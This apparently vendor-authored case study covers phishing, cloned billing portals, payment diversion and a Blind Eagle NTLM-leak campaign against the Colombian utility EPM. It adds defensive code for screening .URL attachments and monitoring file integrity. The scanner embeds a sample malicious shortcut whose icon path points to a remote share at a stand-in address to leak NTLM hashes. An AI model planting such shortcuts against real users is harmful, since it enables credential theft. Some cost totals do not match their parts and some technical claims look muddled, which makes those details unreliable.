Incident Snapshot

Timeline of Key Events

June 14, 2024 – Massive Clone of “Factura Web” Portal

On the night of June 14, 2024, EPM discovered that cybercriminals had created a near-perfect clone of its official billing site (facturaweb.epm.com.co). When customers entered their contract numbers, the cloned site showed the correct billing amount and due date, but payment details were redirected to mule accounts controlled by the attackers. EPM confirmed the impersonation on June 15 and immediately warned users to only pay through the official website, the "EPM Estamos Ahí" app, or the printed invoice QR code.

December 23, 2024 – Holiday “Gift” Scam via WhatsApp and SMS

By late 2024, a new scam spread rapidly. WhatsApp and SMS messages promised “Christmas gifts” and COP 49,000 refunds for service surcharges. Victims were directed to a fake microsite that requested their contract number and card information. On December 23, EPM issued a public notice warning customers that the messages were fraudulent and urged them to manually enter the official URL. Hundreds of complaints flooded EPM's call center over the holidays, prompting an official bulletin.

April – May 2025: Advanced Spoofing and Suspected Internal Breach

On May 23, 2025, another large-scale incident emerged. Customers who accessed the legitimate facturaweb.epm.com.co site reported being redirected to third-party accounts, losing up to COP 500,000 (~US $130) while believing they were still on the official platform. EPM disabled all online payment channels — website, app billing module, and WhatsApp payments — on May 24 and instructed users to pay in person until the threat was removed.

Several victims claimed they had accessed the site directly from saved bookmarks, suggesting a possible back-end compromise rather than simple domain impersonation. Tech forums speculated that malicious code may have been injected into EPM’s payment scripts, allowing legitimate transactions to be rerouted without altering the visible URL.

Parallel APT Pressure by Blind Eagle (Spring 2025)

Simultaneously, intelligence agencies reported that the Colombian APT group APT-C-36 (“Blind Eagle”) targeted public utilities in March–April 2025. They distributed malicious .URL attachments exploiting CVE-2024-43451 (an NTLM hash leak vulnerability) to exfiltrate VPN and helpdesk credentials. Once the hash exchange was successful, AsyncRAT implants were delivered via GitHub to maintain persistence in EPM’s network.


Attack Tactics and Techniques (MITRE ATT&CK Summary)

  1. Brand Spoofing: Threat actors registered lookalike domains (typosquatting) and replicated EPM’s CSS, logos, and user flows to create indistinguishable fake portals.
  2. Phishing via Malicious Links: Paid ads on Instagram/Facebook (June 2024) and mass WhatsApp/SMS messages (December 2024) led users to credential-harvesting sites.
  3. Credential Theft via Fake Forms: Cloned pages included forms collecting contract numbers, card details, and billing credentials with no legitimate encryption.
  4. NTLM Exfiltration and Spear Phishing: APT-C-36 sent .URL files that exfiltrated NTLMv2 hashes once opened. AsyncRAT was deployed to retain remote access.
  5. Persistence Through Legitimate Tools: AsyncRAT created registry run keys and scheduled tasks to reconnect with C2 servers even if users logged out.
  6. Monetization via Payment Redirection: Funds intended for utility bills were diverted to attacker-controlled accounts, then laundered via microtransactions or digital services.
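The .URL technique described in the timeline and in item 4 above can be screened for at the mail gateway: a Windows Internet Shortcut is a small INI file, and the keys the shell resolves on open (URL, IconFile, WorkingDirectory) should never point at a UNC share or file:// path in a legitimate attachment. The scanner below is an added illustration written for this summary, not EPM's or any vendor's code; the two shortcut files and the 203.0.113.10 address are constructed samples.

```python
import configparser
import re

# Constructed sample attachments (not artifacts from the incidents above).
# The benign one only opens an https URL; the suspicious one asks the shell
# to fetch its icon from a remote share, which triggers an NTLM exchange.
BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://facturaweb.epm.com.co/
IconIndex=0
"""

SUSPICIOUS_URL_FILE = r"""[InternetShortcut]
URL=https://facturaweb.epm.com.co/
IconFile=\\203.0.113.10\share\icon.ico
IconIndex=0
"""

# Keys whose value Explorer resolves when the shortcut is rendered or opened.
RESOLVED_KEYS = ("url", "iconfile", "workingdirectory")
# Values starting with \\, //, file: or smb: leave the local machine.
REMOTE_REF = re.compile(r"^(\\\\|//|file:|smb:)", re.IGNORECASE)


def parse_url_file(text):
    """Return the [InternetShortcut] section as a dict with lower-case keys."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    if "InternetShortcut" not in cp:
        return {}
    return {k.lower(): v for k, v in cp["InternetShortcut"].items()}


def find_remote_references(text):
    """List (key, value) pairs whose value points outside the host."""
    findings = []
    for key, value in parse_url_file(text).items():
        value = value.strip()
        if key in RESOLVED_KEYS and REMOTE_REF.search(value):
            findings.append((key, value))
    return findings


def should_quarantine(filename, content):
    """Gateway decision: hold any .url attachment with a remote reference."""
    if not filename.lower().endswith(".url"):
        return False
    return bool(find_remote_references(content))
```

The same check belongs in EDR telemetry: an outbound SMB connection from a workstation immediately after a .url file is written to disk is the host-side view of the exchange described above.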


Operational and User Impact

  • Customer Losses: In June 2024, thousands unknowingly accessed cloned portals. Local banks reported tens of thousands of payment attempts redirected to fraud accounts. Hundreds of families lost between COP 100,000 and 500,000 each, triggering panic and a flood of support calls.
  • Digital Channel Disruption: EPM disabled online payments for two days in June 2024, and again from May 24–30, 2025. Over 1.2 million users had to pay in person or through bank correspondents. The May 2025 disruption alone resulted in a 35% drop in daily collections (~US $3M/day) due to waived late fees and processing delays.
  • Support Overload and Reputational Damage: EPM’s call center experienced a 400% spike in call volume within 48 hours of each phishing wave. By July 2025, user trust had dropped: only 62% felt “safe” using EPM’s digital platforms vs. 89% before June 2024.
  • Regulatory Scrutiny: After the June 2024 incident, Colombia’s SIC opened an investigation into EPM’s cybersecurity controls. In January 2025, the national energy regulator requested evidence of improved billing portal defenses.


Estimated Financial Costs

Below are the main cost categories, drawn from public statements and standard industry estimates.

  • June 2024 Wave ("Factura Web" Clone):
    • Customer payments diverted: ~COP 900M (≈ US $230K)
    • Incident response and forensics: COP 2.3B (≈ US $580K)
    • Lost digital revenue (2-day disruption): COP 1.4B (≈ US $350K)
    • Customer support and goodwill credits: COP 900M (≈ US $230K)
    • Estimated total (June 2024): COP 5.5B (≈ US $1.4M)


  • December 2024 – March 2025 (Holiday scams & minor incidents):
    • Payments diverted via WhatsApp/SMS: ~COP 400M (≈ US $100K)
    • Prevention and communications: COP 200M (≈ US $50K)
    • Expanded support operations: COP 350M (≈ US $90K)
    • Estimated total (Holiday wave): COP 950M (≈ US $240K)


  • May 2025 Wave (Suspected backend breach):
    • Payments diverted: ~COP 250M (≈ US $65K)
    • Incident response and investigation: COP 3.2B (≈ US $800K)
    • Lost digital revenue (6-day outage): COP 7.2B (≈ US $1.8M)
    • Customer compensation: COP 700M (≈ US $175K)
    • Estimated total (May 2025): COP 11.35B (≈ US $2.3M)

Total cost (18-month period): COP 17.8B (≈ US $4M). This excludes reputational damage and potential future regulatory fines.


Lessons Learned and Defensive Recommendations

  1. Treat the billing portal as critical infrastructure: Host Factura Web on an isolated architecture with MFA between server layers. Deploy a Web Application Firewall (WAF), perform checksum-based file integrity monitoring, and continuously scan third-party libraries (e.g., for CVE-2024-43451).
  2. Ongoing domain and brand monitoring: Scan DNS records and social networks before peak billing periods (end of month, government subsidies, holidays). Coordination with Meta and Google reduced fake-site traffic by ~30% in June 2024.
  3. Automated communication and alerts: A single social media bulletin in December 2024 reduced malicious clicks by one-third in 48 hours. Automate SMS and WhatsApp alerts when new phishing domains are detected.
  4. Tokenized e-billing with MFA: Colombia’s Resolution 008 of 2024 on e-billing should be leveraged to implement one-time-use tokens tied to national ID numbers. This prevents attackers from paying with just a contract number.
  5. Strengthen cyber intelligence and APT response: Blind Eagle’s NTLM theft highlights that public utilities are high-value targets. Invest in a dedicated SOC with CISA-certified analysts and deploy EDR across all critical servers.
  6. Secure third-party ecosystems and isolated payment environments: Since attackers exploited compromised WordPress/Joomla sites and injected code in 2025, regularly audit all CMS and host payment services in an isolated, hardened environment.
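Recommendation 1's checksum-based file integrity monitoring is what would have caught the scenario forum users speculated about in May 2025: a payment script altered on the server while the URL in the browser stays legitimate. The script below is an added example written for this summary, not EPM's tooling; it hashes the served scripts under a web root, stores the baseline, and reports additions, modifications and removals. The web root, file names and script contents in `demo()` are constructed placeholders.

```python
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large bundles do not sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(webroot, extensions=(".js", ".html", ".php")):
    """Map each served script/template (path relative to webroot) to its hash."""
    baseline = {}
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if name.lower().endswith(extensions):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, webroot).replace(os.sep, "/")
                baseline[rel] = sha256_file(full)
    return baseline


def compare_to_baseline(webroot, baseline):
    """Diff the current tree against a trusted baseline taken at deploy time."""
    current = build_baseline(webroot)
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed web root: the payment script is tampered with after deploy."""
    with tempfile.TemporaryDirectory() as root:
        js_dir = os.path.join(root, "js")
        os.makedirs(js_dir)
        pay = os.path.join(js_dir, "payment.js")
        with open(pay, "w") as f:
            f.write("submitPayment('https://facturaweb.epm.com.co/pay');\n")
        baseline = build_baseline(root)  # taken from a known-good deploy
        with open(pay, "w") as f:       # simulated injection: new destination
            f.write("submitPayment('https://placeholder.invalid/pay');\n")
        with open(os.path.join(js_dir, "dropped.js"), "w") as f:
            f.write("// constructed file that was never deployed\n")
        return compare_to_baseline(root, baseline)
```

Keep the baseline off the web server (signed, or in the CI system that produced the deploy) so an attacker with write access to the web root cannot update it alongside the scripts.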


Conclusion

EPM’s trajectory—from a simple cloned portal in June 2024 to a suspected backend breach in May 2025—reveals a broader Latin American reality: public utilities are high-value targets, and threat actors iterate at startup speed. What began as basic typosquatting turned into a six-day billing blackout and a sophisticated NTLM hash theft campaign by Blind Eagle.

For any Latin American organization—especially those delivering essential services—the imperative is clear: assume your portals and brand are already under attack and act with urgency measured in hours, not weeks. Ongoing domain takedowns, robust email authentication (SPF/DKIM/DMARC), hardened legacy protocols (disabling automatic .URL/.SCF launches), and strict third-party governance are the foundations of a defense that keeps the lights on and customer trust intact.

EPM’s story is not unique. Discover how this pattern of fraud is repeating across critical infrastructure providers—and how Centurio International is helping contain its spread and protect victims.